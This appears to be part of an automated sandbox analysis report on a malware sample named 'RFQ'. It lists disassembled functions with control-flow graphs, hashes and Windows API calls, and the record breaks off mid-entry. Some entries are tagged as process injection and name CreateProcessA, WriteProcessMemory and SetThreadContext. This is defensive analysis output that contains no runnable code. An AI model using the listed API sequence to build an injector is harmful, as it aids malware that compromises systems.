                                                                                                        control_flow_graph 294 74046a3 295 74046a8-74046ab 294->295 296 74046bd-74046c1 295->296 297 74046ad 295->297 308 74046c3-74046cc 296->308 309 74046e4 296->309 297->296 298 74048a3-74048b6 297->298 299 74049e3-74049e7 297->299 300 7404983-7404987 297->300 301 74048f4-74048f9 297->301 302 7404a15-7404a1e 297->302 303 7404896-740489e 297->303 304 740480a-740481d 297->304 305 740473b-740473f 297->305 306 74047bd-74047f3 297->306 307 74048fe-7404902 297->307 349 74048b8-74048c2 298->349 350 74048ed-74048f2 298->350 316 7404a08 299->316 317 74049e9-74049f2 299->317 312 7404989-7404992 300->312 313 74049aa 300->313 301->295 303->295 340 7404a21 304->340 341 7404823-7404838 304->341 314 7404741-740474a 305->314 315 7404762 305->315 306->340 374 74047f9-7404805 306->374 320 7404904-740490d 307->320 321 7404925 307->321 310 74046d3-74046e0 308->310 311 74046ce-74046d1 308->311 318 74046e7-74046e9 309->318 332 74046e2 310->332 311->332 334 7404994-7404997 312->334 335 7404999-74049a6 312->335 338 74049ad-74049c8 313->338 326 7404751-740475e 314->326 327 740474c-740474f 314->327 330 7404765-7404769 315->330 331 7404a0b-7404a12 316->331 328 74049f4-74049f7 317->328 329 74049f9-74049fc 317->329 336 7404701-7404726 318->336 337 74046eb-74046f1 318->337 322 7404914-7404921 320->322 323 740490f-7404912 320->323 325 7404928-740492c 321->325 339 7404923 322->339 323->339 342 740492e-7404937 325->342 343 740494f 325->343 344 7404760 326->344 327->344 345 7404a06 328->345 329->345 346 740476b-7404774 330->346 347 740478c 330->347 332->318 351 74049a8 334->351 335->351 376 740472e-7404736 336->376 352 74046f3 337->352 353 74046f5-74046ff 337->353 383 74049d4-74049db 338->383 384 74049ca 338->384 339->325 340->340 377 740484a 341->377 378 740483a-7404848 341->378 358 7404939-740493c 342->358 359 740493e-740494b 342->359 361 7404952-740495e 343->361 344->330 345->331 362 7404776-7404779 346->362 363 740477b-7404788 346->363 364 740478f-74047b8 347->364 349->340 365 74048c8-74048d9 349->365 367 74048e8 350->367 351->338 352->336 353->336 371 740494d 358->371 359->371 386 7404960-7404966 361->386 387 7404976-740497e 361->387 372 740478a 362->372 363->372 364->295 365->340 373 74048df-74048e6 365->373 367->295 371->361 372->364 373->367 374->295 376->295 385 740484c-740484e 377->385 378->385 383->340 389 74049dd-74049e1 383->389 388 74049cf 384->388 390 7404850-7404856 385->390 391 7404868-740487f 385->391 392 7404968 386->392 393 740496a-740496c 386->393 387->295 388->295 389->388 395 7404858 390->395 396 740485a-7404866 390->396 391->340 399 7404885-7404891 391->399 392->387 393->387 395->391 396->391 399->295
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017309985.0000000007400000.00000040.00000800.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7400000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: fbq$ fbq$ fbq$Te]q$Te]q$XX]q$XX]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                                                        • API String ID: 0-148817952
                                                                                                        • Opcode ID: d81b9c47fe622d8c65c14a0a8815f2c6ea7239950e4e29a6eaa9827e215465a5
                                                                                                        • Instruction ID: 96c7a786ad759e2d3a84de9621b33fc9c2684cbd3ced1eb2c32432a135bfbf42
                                                                                                        • Opcode Fuzzy Hash: d81b9c47fe622d8c65c14a0a8815f2c6ea7239950e4e29a6eaa9827e215465a5
                                                                                                        • Instruction Fuzzy Hash: F8A160B4A10299CFDB148EACC544AEEB7B6BF83701F658936D9416B3D4C7349C42CB91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 074046BC Relevance: 12.8, Strings: 10, Instructions: 276COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 400 74046bc 401 74046bd-74046c1 400->401 402 74046c3-74046cc 401->402 403 74046e4 401->403 404 74046d3-74046e0 402->404 405 74046ce-74046d1 402->405 406 74046e7-74046e9 403->406 407 74046e2 404->407 405->407 408 7404701-7404726 406->408 409 74046eb-74046f1 406->409 407->406 415 740472e-7404736 408->415 411 74046f3 409->411 412 74046f5-74046ff 409->412 411->408 412->408 416 74046a8-74046ab 415->416 416->401 417 74046ad 416->417 417->401 418 74048a3-74048b6 417->418 419 74049e3-74049e7 417->419 420 7404983-7404987 417->420 421 74048f4-74048f9 417->421 422 7404a15-7404a1e 417->422 423 7404896-740489e 417->423 424 740480a-740481d 417->424 425 740473b-740473f 417->425 426 74047bd-74047f3 417->426 427 74048fe-7404902 417->427 460 74048b8-74048c2 418->460 461 74048ed-74048f2 418->461 432 7404a08 419->432 433 74049e9-74049f2 419->433 428 7404989-7404992 420->428 429 74049aa 420->429 421->416 423->416 452 7404a21 424->452 453 7404823-7404838 424->453 430 7404741-740474a 425->430 431 7404762 425->431 426->452 481 74047f9-7404805 426->481 435 7404904-740490d 427->435 436 7404925 427->436 442 7404994-7404997 428->442 443 7404999-74049a6 428->443 448 74049ad-74049c8 429->448 444 7404751-740475e 430->444 445 740474c-740474f 430->445 449 7404765-7404769 431->449 450 7404a0b-7404a12 432->450 446 74049f4-74049f7 433->446 447 74049f9-74049fc 433->447 437 7404914-7404921 435->437 438 740490f-7404912 435->438 440 7404928-740492c 436->440 451 7404923 437->451 438->451 454 740492e-7404937 440->454 455 740494f 440->455 462 74049a8 442->462 443->462 456 7404760 444->456 445->456 457 7404a06 446->457 447->457 489 74049d4-74049db 448->489 490 74049ca 448->490 458 740476b-7404774 449->458 459 740478c 449->459 451->440 452->452 483 740484a 453->483 484 740483a-7404848 453->484 466 7404939-740493c 454->466 467 740493e-740494b 454->467 469 7404952-740495e 455->469 456->449 457->450 470 7404776-7404779 458->470 471 740477b-7404788 458->471 472 740478f-74047b8 459->472 460->452 473 74048c8-74048d9 460->473 475 74048e8 461->475 462->448 478 740494d 466->478 467->478 492 7404960-7404966 469->492 493 7404976-740497e 469->493 479 740478a 470->479 471->479 472->416 473->452 480 74048df-74048e6 473->480 475->416 478->469 479->472 480->475 481->416 491 740484c-740484e 483->491 484->491 489->452 495 74049dd-74049e1 489->495 494 74049cf 490->494 496 7404850-7404856 491->496 497 7404868-740487f 491->497 498 7404968 492->498 499 740496a-740496c 492->499 493->416 494->416 495->494 501 7404858 496->501 502 740485a-7404866 496->502 497->452 505 7404885-7404891 497->505 498->493 499->493 501->497 502->497 505->416
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017309985.0000000007400000.00000040.00000800.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7400000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: fbq$ fbq$Te]q$XX]q$XX]q$XX]q$$]q$$]q$$]q$$]q
                                                                                                        • API String ID: 0-4039791027
                                                                                                        • Opcode ID: 1ba3e32d2e381a09a3e9b7f53c5949e4e94b0bd1fa6f81b59520c7d596ddb9f5
                                                                                                        • Instruction ID: a57fefc1c92c57a6432d34b3c0040413ed8e7933152992f7a02e258d5b8c1f06
                                                                                                        • Opcode Fuzzy Hash: 1ba3e32d2e381a09a3e9b7f53c5949e4e94b0bd1fa6f81b59520c7d596ddb9f5
                                                                                                        • Instruction Fuzzy Hash: 7CB1B1F4A14289CFDB149BACC548AEDBBB1AB83310F14497BD6019B2D4D7389892CB81
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0122DBD8 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 743 122dbd8-122dc67 GetCurrentProcess 747 122dc70-122dca4 GetCurrentThread 743->747 748 122dc69-122dc6f 743->748 749 122dca6-122dcac 747->749 750 122dcad-122dce1 GetCurrentProcess 747->750 748->747 749->750 752 122dce3-122dce9 750->752 753 122dcea-122dd02 750->753 752->753 756 122dd0b-122dd3a GetCurrentThreadId 753->756 757 122dd43-122dda5 756->757 758 122dd3c-122dd42 756->758 758->757
                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0122DC56
                                                                                                        • GetCurrentThread.KERNEL32 ref: 0122DC93
                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0122DCD0
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0122DD29
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2009243448.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_1220000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Current$ProcessThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2063062207-0
                                                                                                        • Opcode ID: 5b31c92b4dd3fde800431e98682c04833beb8d1deb3a03fd44d1343a56749b84
                                                                                                        • Instruction ID: 5fddfbf0c6087914d08c005c6e53f584b5a9da269e144b9b221a66b7b1282763
                                                                                                        • Opcode Fuzzy Hash: 5b31c92b4dd3fde800431e98682c04833beb8d1deb3a03fd44d1343a56749b84
                                                                                                        • Instruction Fuzzy Hash: 895168B09003099FDB04DFAAD648BAEBBF5FF48304F208459E109A7261DB799945CF65
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 072F1108 Relevance: 5.4, Strings: 4, Instructions: 354COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 764 72f1108-72f1119 765 72f112b 764->765 766 72f111b-72f1129 764->766 767 72f112d-72f112f 765->767 766->767 768 72f127c-72f128f 767->768 769 72f1135-72f1148 767->769 772 72f114a-72f1153 769->772 773 72f1156-72f115a 769->773 774 72f116d-72f1186 773->774 775 72f115c-72f116a 773->775 780 72f118c-72f11a5 774->780 781 72f1300-72f1351 774->781 775->774 780->781 786 72f11ab-72f11ea 780->786 784 72f1363 781->784 785 72f1353-72f1361 781->785 787 72f1365-72f1367 784->787 785->787 802 72f123c-72f1240 786->802 803 72f11ec-72f11f2 786->803 788 72f136d-72f1380 787->788 789 72f14b4-72f14c7 787->789 794 72f138e-72f1392 788->794 795 72f1382-72f138b 788->795 796 72f13a5-72f13be 794->796 797 72f1394-72f13a2 794->797 810 72f1538-72f1567 call 72f0fe0 796->810 811 72f13c4-72f13dd 796->811 797->796 807 72f1292-72f12f9 802->807 808 72f1242-72f1246 802->808 804 72f11f5-72f11fd 803->804 804->781 809 72f1203-72f1221 804->809 807->781 808->781 812 72f124c-72f1253 808->812 818 72f122f-72f123a 809->818 819 72f1223-72f1225 809->819 827 72f156c-72f156e 810->827 811->810 821 72f13e3-72f1422 811->821 812->781 814 72f1259-72f1279 812->814 818->802 818->804 819->818 834 72f1474-72f1478 821->834 835 72f1424-72f142a 821->835 838 72f14ca-72f1531 834->838 839 72f147a-72f147e 834->839 837 72f142d-72f1435 835->837 837->810 841 72f143b-72f1459 837->841 838->810 839->810 840 72f1484-72f148b 839->840 840->810 842 72f1491-72f14b1 840->842 847 72f145b-72f145d 841->847 848 72f1467-72f1472 841->848 847->848 848->834 848->837
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017037657.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_72f0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Haq$Haq$$]q$$]q
                                                                                                        • API String ID: 0-248378458
                                                                                                        • Opcode ID: 08c03cc00667ef17e45f167ce869fcec5edaf6bf185db1e03cc8e479641d456c
                                                                                                        • Instruction ID: 52162a120f7eead8e512aad48955f650ac60466ed1c6e5cd47ade5a45175b53d
                                                                                                        • Opcode Fuzzy Hash: 08c03cc00667ef17e45f167ce869fcec5edaf6bf185db1e03cc8e479641d456c
                                                                                                        • Instruction Fuzzy Hash: 9AC18CB1A0021ACFCB18DF68C584A6EFBE2FF84310F14C56AD9199B395DB35D846CB91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 077B83A8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 077B85DE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017648770.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_77b0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 963392458-0
                                                                                                        • Opcode ID: 4f95aa5d548f36d68fb4ea2c0e1ae3b859cbd2ce25c1fe7753d592f0dcb7f9ce
                                                                                                        • Instruction ID: 77b3c369c360d680bb024aa4cf1dbf7f9afdadc188c2ce63d01cb4126bf4e108
                                                                                                        • Opcode Fuzzy Hash: 4f95aa5d548f36d68fb4ea2c0e1ae3b859cbd2ce25c1fe7753d592f0dcb7f9ce
                                                                                                        • Instruction Fuzzy Hash: DD917CB1D0021ACFDB24CFA8C8407EDBBB6FF48354F1485A9E819A7250DB749985CF92
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 077B839E Relevance: 1.7, APIs: 1, Instructions: 241processCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 077B85DE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017648770.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_77b0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 963392458-0
                                                                                                        • Opcode ID: f91406fb244662f7dca89b3e37d5058bc936b652043d3071dc266a31338a00da
                                                                                                        • Instruction ID: e3dd887a63ab951fd8170a3a8fd1550e8d9f61fd2ddac1df9c19ce7f175aa718
                                                                                                        • Opcode Fuzzy Hash: f91406fb244662f7dca89b3e37d5058bc936b652043d3071dc266a31338a00da
                                                                                                        • Instruction Fuzzy Hash: EA918EB1D0021ACFEB24CFA8C8417EDBBB6FF48354F1485A9D819A7250DB749985CF92
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0122B818 Relevance: 1.7, APIs: 1, Instructions: 204COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0122BA7E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2009243448.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_1220000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: HandleModule
                                                                                                        • String ID:
                                                                                                        • API String ID: 4139908857-0
                                                                                                        • Opcode ID: 4aa6b119f8f5f8ec75e971634682ed5b54602eb611f4d6664b6dceada8f3bb33
                                                                                                        • Instruction ID: 0b1e61d657607b8052584d3ca7cb1a9095ca12a9ecd8ea071357059b1b0fc6b1
                                                                                                        • Opcode Fuzzy Hash: 4aa6b119f8f5f8ec75e971634682ed5b54602eb611f4d6664b6dceada8f3bb33
                                                                                                        • Instruction Fuzzy Hash: 2A814470A10B569FD724CF29D0557AABBF1FF88300F00892ED58AD7A50DB74E94ACB91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 051826A4 Relevance: 1.6, APIs: 1, Instructions: 117COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 051827C2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2015048702.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5180000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 716092398-0
                                                                                                        • Opcode ID: 289b07633d50583817da008dbfe0501e77ff3b8fbb6d45ba922b68d00330138a
                                                                                                        • Instruction ID: 92590219569a98b3e1ced7a5c1b4d1aa73da11dc79a9d40aa5e2977a3d48d932
                                                                                                        • Opcode Fuzzy Hash: 289b07633d50583817da008dbfe0501e77ff3b8fbb6d45ba922b68d00330138a
                                                                                                        • Instruction Fuzzy Hash: 3B51D0B5D003099FDB25DF9AC984ADEFBF5BF48300F24852AE419AB210D7749845CF90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 051826B0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 051827C2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2015048702.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5180000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 716092398-0
                                                                                                        • Opcode ID: ccdcd52105172646a5c172bcd8899b92eaeff758bf673b9d67a09adaf8760aa9
                                                                                                        • Instruction ID: 9ae7a8a6562808397aa50112c7696bc42a7ed53c3869e986946074072cbe57c5
                                                                                                        • Opcode Fuzzy Hash: ccdcd52105172646a5c172bcd8899b92eaeff758bf673b9d67a09adaf8760aa9
                                                                                                        • Instruction Fuzzy Hash: B941A0B5D003099FDB25DF9AC884ADEFBF5BF48310F24812AE819AB250D7759845CF90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 051807CC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 05184D41
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2015048702.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_5180000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CallProcWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 2714655100-0
                                                                                                        • Opcode ID: b7366d8f7000f8a6cedd9c9113de22ed1f934e769fec7e2abdf99249121ed206
                                                                                                        • Instruction ID: 551f171aa8977d1f87ea8394af7e0158a6a99e6aeeca9f76ec58c0fa3856dfdb
                                                                                                        • Opcode Fuzzy Hash: b7366d8f7000f8a6cedd9c9113de22ed1f934e769fec7e2abdf99249121ed206
                                                                                                        • Instruction Fuzzy Hash: B44129B89003058FCB24DF99C448AAAFBF9FF88314F25C959D519A7321D774A845CFA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01224948 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateActCtxA.KERNEL32(?), ref: 01225F11
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2009243448.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_1220000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Create
                                                                                                        • String ID:
                                                                                                        • API String ID: 2289755597-0
                                                                                                        • Opcode ID: a85332dee98bfeed8f4b42d68d8eeaf7619cddfd392bd7df7ecd7d226d5042ab
                                                                                                        • Instruction ID: c54ad29971bc6329563292c4b367fe9789fdea1dd95281923a39068a7fd20f7a
                                                                                                        • Opcode Fuzzy Hash: a85332dee98bfeed8f4b42d68d8eeaf7619cddfd392bd7df7ecd7d226d5042ab
                                                                                                        • Instruction Fuzzy Hash: 7841E0B0C10629DFDB24DFA9C844BDEBBF5BF49304F20806AD418AB255DBB56946CF90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01225E54 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateActCtxA.KERNEL32(?), ref: 01225F11
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2009243448.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_1220000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Create
                                                                                                        • String ID:
                                                                                                        • API String ID: 2289755597-0
                                                                                                        • Opcode ID: e827c3f98e37ed2eb0f7f43da3df64d8750df4269f425ac9b1242845adf8ac5b
                                                                                                        • Instruction ID: 6b76322957052fe53ec85b48aa6cc41bcb23526be6a91f4e50f4441cb4c9ca7b
                                                                                                        • Opcode Fuzzy Hash: e827c3f98e37ed2eb0f7f43da3df64d8750df4269f425ac9b1242845adf8ac5b
                                                                                                        • Instruction Fuzzy Hash: 0D41E2B0C10619DFDB25CFA9C844BDEBBF5BF49304F20806AD418AB255DBB5594ACF90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 077B8120 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 077B81B0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017648770.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_77b0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MemoryProcessWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 3559483778-0
                                                                                                        • Opcode ID: e3fbac710378ab9b53ca555e979dc334db1fe6b6e2c0a5b0ddd104090f87ab7b
                                                                                                        • Instruction ID: 62ce82e855db1f983485061010c858126b3032c05139fe89d410d47e236e37fe
                                                                                                        • Opcode Fuzzy Hash: e3fbac710378ab9b53ca555e979dc334db1fe6b6e2c0a5b0ddd104090f87ab7b
                                                                                                        • Instruction Fuzzy Hash: 8F2119B59003599FCB10DFA9C885BEEBBF5FF88310F10882DE919A7250C7789945CBA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 077B8118 Relevance: 1.6, APIs: 1, Instructions: 68injectionCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 077B81B0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017648770.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_77b0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MemoryProcessWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 3559483778-0
                                                                                                        • Opcode ID: fe0135ad7a444057ae894658b53ef5d23404878d3c6145445f5a6e4adcbee603
                                                                                                        • Instruction ID: 3beb0e79935dd42b62eb1544279321f0536a906b9426e7bf43e5dee4fd58ebf8
                                                                                                        • Opcode Fuzzy Hash: fe0135ad7a444057ae894658b53ef5d23404878d3c6145445f5a6e4adcbee603
                                                                                                        • Instruction Fuzzy Hash: 4521F7B59013099FCB14DFA9C8857DEBBF5FF48310F108829E519A7250C7789955CBA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 077B7B50 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 077B7BCE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017648770.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_77b0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ContextThreadWow64
                                                                                                        • String ID:
                                                                                                        • API String ID: 983334009-0
                                                                                                        • Opcode ID: 0a82f2a1e44cd70e46ae8e3c61dd244311c4e7a9728f8f2eebb1cacc7b6e22ed
                                                                                                        • Instruction ID: f348c1aa321dfcca89ebe67ff3a3a107ba7ad2498b14a551d45626e36da3bcb0
                                                                                                        • Opcode Fuzzy Hash: 0a82f2a1e44cd70e46ae8e3c61dd244311c4e7a9728f8f2eebb1cacc7b6e22ed
                                                                                                        • Instruction Fuzzy Hash: FA2115B19002098FDB14DFAAC485BEFFBF5EF99314F14842AD519A7240CB78A945CFA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 077B8210 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 077B8290
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017648770.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_77b0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MemoryProcessRead
                                                                                                        • String ID:
                                                                                                        • API String ID: 1726664587-0
                                                                                                        • Opcode ID: 17916e177fe377d2df5f6a12d61a3384c43117db6188727922449c5a182e4cad
                                                                                                        • Instruction ID: 98377d4acc63678afe139cff1c8b37dcea2693d286e4476e1e502a5c45dae551
                                                                                                        • Opcode Fuzzy Hash: 17916e177fe377d2df5f6a12d61a3384c43117db6188727922449c5a182e4cad
                                                                                                        • Instruction Fuzzy Hash: 652128B1C002499FCB10DFAAC845AEEFBF5FF48310F108829E519A7250C7389544CBA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 077B7B48 Relevance: 1.6, APIs: 1, Instructions: 62threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 077B7BCE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017648770.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_77b0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ContextThreadWow64
                                                                                                        • String ID:
                                                                                                        • API String ID: 983334009-0
                                                                                                        • Opcode ID: e891c93dc76cf7c508d8a5782cc8d4a34cfd05b8e386e120036d18b2beeccc87
                                                                                                        • Instruction ID: d1283b1926e1af79963f9ebd893d7c78e51e825611321267e97beafa6b68661d
                                                                                                        • Opcode Fuzzy Hash: e891c93dc76cf7c508d8a5782cc8d4a34cfd05b8e386e120036d18b2beeccc87
                                                                                                        • Instruction Fuzzy Hash: C12125B19007098FDB14DFA9C4857EEFBF1AF89314F14882AD559A7240CB789545CF91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 077B8208 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 077B8290
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017648770.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_77b0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MemoryProcessRead
                                                                                                        • String ID:
                                                                                                        • API String ID: 1726664587-0
                                                                                                        • Opcode ID: 52f3230c0a79f84300668b086672938932292b4ee392f4de39d8187a0eb7361b
                                                                                                        • Instruction ID: 1521635343d35eaaa22a881d107e2da02a79310621e1367fcf9866e28b5369c6
                                                                                                        • Opcode Fuzzy Hash: 52f3230c0a79f84300668b086672938932292b4ee392f4de39d8187a0eb7361b
